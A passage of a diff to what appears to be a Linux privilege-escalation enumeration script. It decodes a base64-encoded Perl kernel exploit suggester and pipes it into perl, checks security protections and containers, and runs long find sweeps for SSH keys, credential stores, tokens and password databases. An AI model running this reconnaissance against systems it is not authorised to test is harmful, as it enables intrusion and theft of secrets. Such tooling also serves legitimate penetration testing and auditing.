zAnLCAnMi42LjMxJywgJzIuNi4zMicsCiAgICAgICAgICAgICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsICcyLjYuMzYnLCAnMi42LjM3JywgJzIuNi4zOCcsCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy43LjYnLCAgJzMuOC4wJywgICczLjkuMCcsCiAgICAgICAgICAgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xNC4wJywgJzMuMTUuMCcsCiAgICAgICAgICAgICczLjE2LjAnLCAnMy4xNy4wJywgJzMuMTguMCcsICczLjE5LjAnLCAnNC4wLjAnLCAgJzQuMS4wJywKICAgICAgICAgICAgJzQuMi4wJywgICc0LjMuMCcsICAnNC40LjAnLCAgJzQuNS4wJywgICc0LjYuMCcsICAnNC43LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTgtMTQ2NjUnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80NTY5NycsCiAgICB9LAogICk7Cn0KCl9fRU5EX18KPWhlYWQxIE5BTUUKCmxpbnV4X2V4cGxvaXRfc3VnZ2VzdGVyLTIucGwgLSBBIGxvY2FsIGV4cGxvaXQgc3VnZ2VzdGVyIGZvciBsaW51eAoKPWhlYWQxIERFU0NSSVBUSU9OCgpUaGlzIHBlcmwgc2NyaXB0IHdpbGwgZW51bWVyYXRlIHRoZSBwb3NzaWJsZSBleHBsb2l0cyBhdmFpbGFibGUgZm9yIGEgZ2l2ZW4ga2VybmVsIHZlcnNpb24KCj1oZWFkMSBVU0FHRQoKWy1oXSBIZWxwICh0aGlzIG1lc3NhZ2UpClsta10gS2VybmVsIG51bWJlciAoZWcuIDIuNi4yOCkKWy1kXSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudQoKWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KQp0byBzZWUgYWxsIGV4cGxvaXRzIGF2YWlsYWJsZS4KCj1oZWFkMSBBVVRIT1IKCkpvbmF0aGFuIERvbmFzIChjKSAyMDE5Cgo9Y3V0Cgo9aGVhZDEgTElDRU5TRQoKIExpbnV4IEV4cGxvaXQgU3VnZ2VzdGVyIDIKCiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2YgdGhlIExpY2Vuc2UsIG9yCiAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLgoKIFRoaXMgcHJvZ3JhbSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUgdXNlZnVsLAogYnV0IFdJVEhPVVQgQU5ZIFdBUlJBTlRZOyB3aXRob3V0IGV2ZW4gdGhlIGltcGxpZWQgd2FycmFudHkgb2YKIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9TRS4gIFNlZSB0aGUKIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGZvciBtb3JlIGRldGFpbHMuCiAgICAgICAgCiBZb3Ugc2hvdWxkIGhhdmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhbG9uZwogd2l0aCB0aGlzIHByb2dyYW07IGlmIG5vdCwgd3JpdGUgdG8gdGhlIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwgSW5jLiwKIDUxIEZyYW5rbGluIFN0cmVldCwgRmlmdGggRmxvb3IsIEJvc3RvbiwgTUEgMDIxMTAtMTMwMSBVU0EuCgo9Y3V0Cg==" + echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g" + echo "" +fi + +if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Doctor Suggestions" + brew doctor + echo "" +fi + + + +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then + aa-status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then + ls -d /etc/apparmor* +else + echo_not_found "AppArmor" +fi + +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," + +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then + print_list "Gatekeeper enabled? .......... "$NC + (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + print_list "sleepimage encrypted? ........ "$NC + (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no + + print_list "XProtect? .................... "$NC + (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no + + print_list "SIP enabled? ................. "$NC + csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no + + print_list "Connected to JAMF? ........... "$NC + warn_exec jamf checkJSSConnection + + print_list "Connected to AD? ............. "$NC + dsconfigad -show && echo "" || echo_no +fi + +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; +else + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi + echo "" +fi + +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null + +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then + detectedvirt=$(systemd-detect-virt) + if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi +else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi +fi + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q container; then +print_title "Container" ########################################### #---------) Container functions (---------# ########################################### @@ -996,444 +1522,47 @@ checkContainerExploits() { } -########################################### -#-----------) Some Basic Info (-----------# -########################################### +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck -print_title "Basic information" -printf $LG"OS: "$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," -printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$idB,${SED_RED},g" -printf $LG"Hostname: "$NC -hostname 2>/dev/null -printf $LG"Writable folder: "$NC; -echo $Wfolder -if [ "$DISCOVER_BAN_GOOD" ]; then - printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC" -else - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" -fi +print_2title "Container related tools present" +command -v docker +command -v lxc +command -v rkt +command -v kubectl +command -v podman +command -v runc -if [ "$SCAN_BAN_GOOD" ]; then - printf $YELLOW"[+] $SCAN_BAN_GOOD\n$NC" -else - printf $RED"[-] $SCAN_BAN_BAD\n$NC" -fi -if [ "$(command -v nmap 2>/dev/null)" ];then - NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" - printf $YELLOW"[+] $NMAP_GOOD\n$NC" -fi -echo "" -echo "" +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" -########################################### -#--------) Check if network jobs (--------# -########################################### -if [ "$PORTS" ]; then - if [ "$SCAN_BAN_GOOD" ]; then - if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then - printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; - printf ${BLUE}"$HELP"$NC; - exit 0 - else - #Select the correct configuration of the netcat found - select_nc - fi - else - printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; - printf ${BLUE}"$HELP"$NC; - exit 0 - fi -fi - -if [ "$DISCOVERY" ]; then - if [ "$PORTS" ]; then - discovery_port_scan $DISCOVERY $PORTS - else - if [ "$DISCOVER_BAN_GOOD" ]; then - discover_network $DISCOVERY - else - printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC; - fi - fi - exit 0 - -elif [ "$IP" ]; then - select_nc - tcp_port_scan $IP "$PORTS" - exit 0 -fi - - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFiles || echo $CHECKS | grep -q SofI; then - ########################################### - #----------) Caching Finds (--------------# - ########################################### - - printf $GREEN"Caching directories "$NC - - - #Get home - HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")" - if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder - HOMESEARCH="$HOME $HOMESEARCH" - fi - GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" - - CONT_THREADS=0 - # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"system.d\" -o -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"roundcube\" -o -name \"filezilla\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \"mysql\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"sentry\" -o -name \"sites-enabled\" -o -name \"bind\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".bluemix\" -o -name \".irssi\" -o -name \"environments\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"seeddms*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name 